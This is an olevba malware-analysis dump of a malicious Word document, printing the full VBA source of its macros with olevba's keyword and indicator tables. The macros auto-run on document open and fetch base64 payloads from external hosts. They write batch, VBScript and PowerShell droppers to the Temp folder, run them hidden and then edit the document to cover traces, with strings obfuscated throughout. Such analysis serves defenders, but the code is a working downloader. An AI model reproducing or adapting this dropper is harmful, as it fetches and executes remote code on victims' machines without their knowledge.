Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- automa~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: automa~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: automa~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub Auto_Open()
16.     huefhiuwefhwefh
17. End Sub
18. Sub huefhiuwefhwefh()
19.     Dim huwe, auwd As Integer
20.     Dim retVal As Variant
21.     HUWQD = Module1.Huwd(10000)
22.     FL2 = "" & HUWQD
23.     HPPSDJ = "Temp"
24.     PH2 = Module1.Bad("" & HPPSDJ) + "\"
25.     NDUWGD = "461237618273612"
26.    
27.     HYWDAX = "baUhdwuqhdiqwududqwwgdjssadt"
28.     WKDOQ = NDUWGD
29.     PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
30.     + _
31.     "1"
32.     VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
33.     huwe = 1
34.     BAFL = FL2 + Chr(Sgn(-22) + 11 + 10 + 25 + huwe + 0) + Left(HYWDAX, 2) + Right(HYWDAX, 1)
35.    
36.     INTG = "o" & "bject"
37.     AFTG = "module"
38.    
39.     SXE = "" & Chr(Asc(".")) & Chr(Asc("e")) & "xe" & ""
40.     GNG = ".png"
41.    
42.     PHT = "" & "htt" & "p://" & ""
43.     SPIC = PHT + "sav" & "epic.su/"
44.      
45.     PSPTH = PH2 + PSFL
46.     VBPTH = PH2 + VBFL
47.     BAPTH = PH2 + BAFL
48.  
49.     DRT = FreeFile
50.     BFT = FreeFile
51.     CFT = FreeFile
52.     DFT = FreeFile
53.     EFT = FreeFile
54.    
55.    
56.     PBIN = PHT + "hpg.se/tmp/1623782.txt"
57.    
58.     Dim obg, obg4 As Object
59.     Dim asdwq As String
60.     Set obg = CreateObject("MSXML2.ServerXMLHTTP")
61.     obg.Open "GET", PBIN
62.     obg.Send ""
63.     CONT = obg.ResponseText
64.     asdwq = CONT
65.    
66.     HQUWDAAA = "0"
67.     If (asdwq = "") Then
68.         PBIN = PHT + "sundsvallsrk.nu/tmp/1623782.txt"
69.         Set obg4 = _
70.         CreateObject("MSXML2.ServerXMLHTTP")
71.         obg4.Open "GET", PBIN
72.         obg4.Send ""
73.         CONT = obg.ResponseText
74.         asdwq = CONT
75.         HQUWDAAA = "1"
76.     End If
77.    
78.     CONT = Module1.Decode(asdwq)
79.    
80.     TVT10 = Module1.Tort(CONT, "text10")
81.     TVT20 = Module1.Tort(CONT, "text20")
82.     TVT21 = Module1.Tort(CONT, "text21")
83.     TVT30 = Module1.Tort(CONT, "text30")
84.     TVT31 = Module1.Tort(CONT, "text31")
85.     XPT1 = Module1.Tort(CONT, "stext1")
86.     XPT2 = Module1.Tort(CONT, "stext2")
87.     XPT3 = Module1.Tort(CONT, "stext3")
88.    
89.     WVR = Module1.Bad("USERPROFILE")
90.     post1 = InStr(WVR, "sers\")
91.     If (post1 <> 0) Then
92.         VRR = "1"
93.     Else
94.         VRR = "0"
95.     End If
96.    
97.      Module1.WaitFor (1)
98.    
99.     Dim obg2 As Object
100.     Set obg2 = _
101.     CreateObject("MSXML2.ServerXMLHTTP")
102.     MIWDWQ = "http://hpg.se/tmp/lns.txt"
103.     If (HQUWDAAA = "1") Then
104.         MIWDWQ = "http://sundsvallsrk.nu/tmp/lns.txt"
105.     End If
106.     obg2.Open "GET", MIWDWQ
107.     obg2.Send ""
108.     SEXX = obg2.ResponseText
109.    
110.     PSTB = PBIN + "123123123"
111.     STAR1 = SPIC + "5550684" + GNG
112.     STAR2 = SPIC + "5540444" + GNG
113.     FFQ = "8"
114.     FF = FFQ + SXE
115.    
116.    
117.      If (VRR = "0") Then
118.      Open BAPTH For Output As #DRT
119.      Print #DRT, XPT1
120.      Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
121.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
122.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
123.      Print #DRT, XPT2
124.      Close #DRT
125.      
126.      Module1.WaitFor (2)
127.      
128.      Open VBPTH For Output As #BFT
129.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
130.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
131.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
132.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
133.      Print #BFT, XPT3
134.      Close #BFT
135.      
136.      Module1.WaitFor (2)
137.      NTH1 = Module1.Freat(retVal, BAPTH)
138.      
139.      End If
140.      
141.      If (VRR = "1") Then
142.      Open PSPTH For Output As #CFT
143.      Print #CFT, "$aisjd = '123';"
144.      Print #CFT, "$stat = '" + STAR2 + "';"
145.      Print #CFT, "$ggtt  = '" + SEXX + "';"
146.      Print #CFT, "$pths = '" + PH2 + "';"
147.      Print #CFT, "$wehs = '" + FL2 + "';"
148.      Print #CFT, "$nnm = '" + FFQ + "';"
149.      Print #CFT, TVT10
150.      Close #CFT
151.      
152.      Open VBPTH For Output As #DFT
153.      Print #DFT, TVT30
154.      Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
155.      Print #DFT, TVT31
156.      Close #DFT
157.    
158.      Open BAPTH For Output As #EFT
159.      Print #EFT, "@echo off"
160.      Print #EFT, TVT20
161.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
162.      Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
163.      Print #EFT, TVT21
164.      Close #EFT
165.      Module1.WaitFor (1)
166.    
167.      NTH2 = Module1.Freat(retVal, BAPTH)
168.      
169.     End If
170.  
171.     JUW = Chr(47)
172.     AKK = Chr(60)
173.     ZKK = ">"
174.     NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
175.     NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
176.     NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
177.     NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
178.     NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
179.     NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
180.  
181. End Sub
182. Sub AutoOpen()
183.     Auto_Open
184. End Sub
185. Sub Workbook_Open()
186.     Auto_Open
187. End Sub
188. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
189. ANALYSIS:
190. +------------+----------------------+-----------------------------------------+
191. | Type       | Keyword              | Description                             |
192. +------------+----------------------+-----------------------------------------+
193. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
194. | AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
195. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
196. | Suspicious | CreateObject         | May create an OLE object                |
197. | Suspicious | Open                 | May open a file                         |
198. | Suspicious | Output               | May write to a file (if combined with   |
199. |            |                      | Open)                                   |
200. | Suspicious | Print #              | May write to a file (if combined with   |
201. |            |                      | Open)                                   |
202. | Suspicious | Chr                  | May attempt to obfuscate specific       |
203. |            |                      | strings                                 |
204. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
205. |            |                      | be used to obfuscate strings (option    |
206. |            |                      | --decode to see all)                    |
207. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
208. |            |                      | may be used to obfuscate strings        |
209. |            |                      | (option --decode to see all)            |
210. | IOC        | http://hpg.se/tmp/ln | URL                                     |
211. |            | s.txt                |                                         |
212. | IOC        | http://sundsvallsrk. | URL                                     |
213. |            | nu/tmp/lns.txt       |                                         |
214. +------------+----------------------+-----------------------------------------+
215. -------------------------------------------------------------------------------
216. VBA MACRO Module1.bas
217. in file: automa~1.doc - OLE stream: u'Macros/VBA/Module1'
218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
219. Public Function Huwd(a As Integer)
220. Huwd = CStr(Int((a * Rnd) + 10000))
221. End Function
222.  
223. Sub WaitFor(NumOfSeconds As Long)
224. Dim SngSec As Long
225. SngSec = Timer + NumOfSeconds
226. Do While Timer < SngSec
227. DoEvents
228. Loop
229. End Sub
230. Public Function Freat(a As Variant, b)
231. a = _
232. Shell(b, 0)
233. Freat = a
234. End Function
235.  
236. Public Function Tort(a, b As String)
237. Dim krd, lent As Integer
238. krd = InStr(1, a, "<" + b + ">") + 8
239. lent = InStr(1, a, "<" + "/" + b + ">") - krd
240. KLMN = Mid(a, krd, lent)
241. AUHWUD = KLMN
242. Tort = AUHWUD
243. End Function
244. Public Function Dtgt(a As String)
245. Quick = GetObject(a)
246. End Function
247.  
248. Public Function Quick(a As String)
249. Quick = GetObject(a)
250. End Function
251.  
252. Public Function Bad(a As String)
253. Bad = _
254. Environ(a)
255. End Function
256.  
257.  
258. Public Function Decode(ByVal strData As String) As String
259.     Dim objXML As Object
260.     Dim objNode As Object
261.     Set objXML = CreateObject("MSXML2.DOMDocument")
262.     Set objNode = objXML.createElement("b64")
263.     objNode.DataType = "bin.base64"
264.     objNode.Text = strData
265.     WUDHA = objNode.nodeTypedValue
266.     Decode = WUDHA
267.     Set objNode = Nothing
268.     Set objXML = Nothing
269. End Function
270.  
271.  
272. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
273. ANALYSIS:
274. +------------+--------------+-----------------------------------------+
275. | Type       | Keyword      | Description                             |
276. +------------+--------------+-----------------------------------------+
277. | Suspicious | CreateObject | May create an OLE object                |
278. | Suspicious | Shell        | May run an executable file or a system  |
279. |            |              | command                                 |
280. | Suspicious | Environ      | May read system environment variables   |
281. +------------+--------------+-----------------------------------------+
282. -------------------------------------------------------------------------------
283. VBA MACRO Module2.bas
284. in file: automa~1.doc - OLE stream: u'Macros/VBA/Module2'
285. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
286. Public Function Nybdqwd(a As String, b As String, c As Integer)
287. Dim selectedText As String
288. Dim hhhg, selRange As Range
289. Set hhhg = ActiveDocument.Range
290. With hhhg.Find
291. .Text = a
292. .MatchWholeWord = True
293. hhhg.Find.Execute
294. hhhg.Collapse direction:=wdCollapseEnd
295. NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
296. Set selRange = ActiveDocument.Range
297. QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
298. selRange.Start = hhhg.End
299. .Text = b
300. .MatchWholeWord = True
301. .Execute
302. hhhg.Collapse direction:=wdCollapseStart
303. selRange.End = hhhg.Start
304. If (c = 1) Then
305.     selectedText = selRange.Delete
306. End If
307. If (c = 2) Then
308.     selRange.Font.Color = wdColorBlack
309. End If
310. If (c = 3) Then
311.     With hhhg.Find
312.     .Text = a
313.     .Replacement.Text = Chr(32)
314.     .Wrap = wdFindContinue
315.     .Execute Replace:=wdReplaceAll
316.     End With
317. End If
318.  
319. End With
320. End Function
321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
322. ANALYSIS:
323. +------------+---------+-----------------------------------------+
324. | Type       | Keyword | Description                             |
325. +------------+---------+-----------------------------------------+
326. | Suspicious | Chr     | May attempt to obfuscate specific       |
327. |            |         | strings                                 |
328. +------------+---------+-----------------------------------------+